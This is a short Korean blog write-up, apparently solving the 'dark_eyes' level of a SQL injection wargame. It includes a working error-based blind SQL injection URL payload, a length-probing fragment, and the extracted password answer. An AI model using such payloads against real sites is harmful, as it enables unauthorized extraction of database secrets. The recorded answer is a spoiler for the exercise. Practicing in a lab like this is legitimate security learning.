반응형
http://los.eagle-jump.org
그림을 클릭하여 들어갑니다
소스를 보니 error based blind sql injection임을 알 수있습니다
저번 단계에서 풀었던 방식인 if나 case가 막혀있으므로
error가 나오면 거짓 안나오면 참으로 풀어보겠습니다
답은 하얀색!!
http://los.eagle-jump.org/dark_eyes_a7f01583a2ab681dc71e5fd3a40c0bd4.php?pw=%27OR%20id=%27admin%27%20and%20(ord(mid(pw,4,1))%3C103%20or%20(select%201%20union%20select%20pw))%20%23
(length(pw)<10%20or%20(select%201%20union%20select%20pw))%20
53 97 50 102 53 100 51 99
5a2f5d3c
'Wargame > log.eagle-jump.org' 카테고리의 다른 글
[LOS] 문제24 Evil_wizard (0) | 2017.09.12 |
---|---|
[LOS] 문제23 Hell_fire (0) | 2017.09.12 |
[LOS] 문제21 iron_golem (0) | 2017.09.11 |
[LOS] 문제20 Dragon (0) | 2017.09.11 |
[LOS] 문제19 Xavis (0) | 2017.09.11 |